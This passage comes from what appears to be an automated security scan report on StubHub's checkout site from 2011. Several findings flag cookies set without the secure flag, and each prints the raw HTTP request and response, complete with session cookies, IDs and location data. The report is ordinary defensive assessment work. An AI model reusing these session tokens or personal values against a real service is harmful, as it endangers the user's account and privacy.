A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Thu, 16 Feb 2012 11:42:18 GMT
Cache-Control: max-age=31536000
Vary: Accept-Encoding
Set-Cookie: TLTHID=CEE212D239C1103934CA8D4B3446FCC6; Path=/; Domain=.stubhub.com


2.16. https://buy.stubhub.com/promotions/scratch/foresee/foresee-analytics-top-e9f04.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/foresee/foresee-analytics-top-e9f04.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/foresee/foresee-analytics-top-e9f04.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Thu, 18 Nov 2010 21:49:07 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Thu, 16 Feb 2012 11:42:18 GMT
Cache-Control: max-age=31536000
Vary: Accept-Encoding
Set-Cookie: TLTHID=CEE1D53839C1103976C8ACBDDDE7ECCC; Path=/; Domain=.stubhub.com


2.17. https://buy.stubhub.com/promotions/scratch/foresee/foresee-trigger.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/foresee/foresee-trigger.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/foresee/foresee-trigger.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Wed, 17 Nov 2010 22:28:59 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1599
Expires: Thu, 16 Feb 2012 11:42:18 GMT
Cache-Control: max-age=31536000
Vary: Accept-Encoding
Set-Cookie: TLTHID=CF138F2E39C1103958ACC35B4524558D; Path=/; Domain=.stubhub.com


2.18. https://buy.stubhub.com/promotions/scratch/lt/www-2.0.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/lt/www-2.0.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/lt/www-2.0.css HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Wed, 02 Feb 2011 23:54:38 GMT
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Thu, 16 Feb 2012 11:42:18 GMT
Cache-Control: max-age=31536000
Vary: Accept-Encoding
Set-Cookie: TLTHID=CEDEEA2639C11039789D94000C1CF856; Path=/; Domain=.stubhub.com


2.19. https://buy.stubhub.com/promotions/scratch/sh/footer_grad.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/sh/footer_grad.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/sh/footer_grad.gif HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Thu, 09 Apr 2009 16:32:49 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; fsr.a=1297856549180; TLTHID=CF183E4839C11039789E94000C1CF856; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:19 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Wed, 16 Feb 2011 12:12:19 GMT
Cache-Control: max-age=1800
Set-Cookie: TLTHID=CF560F4839C1103958ADC35B4524558D; Path=/; Domain=.stubhub.com


2.20. https://buy.stubhub.com/promotions/scratch/sh/footer_hands.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/sh/footer_hands.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/sh/footer_hands.gif HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Thu, 09 Apr 2009 16:33:18 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; fsr.a=1297856549180; TLTHID=CF183E4839C11039789E94000C1CF856; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:19 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Wed, 16 Feb 2011 12:12:19 GMT
Cache-Control: max-age=1800
Set-Cookie: TLTHID=CF55A4E039C110395C85A19FC1E4C140; Path=/; Domain=.stubhub.com


2.21. https://buy.stubhub.com/promotions/scratch/test/mbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/test/mbox.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/test/mbox.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
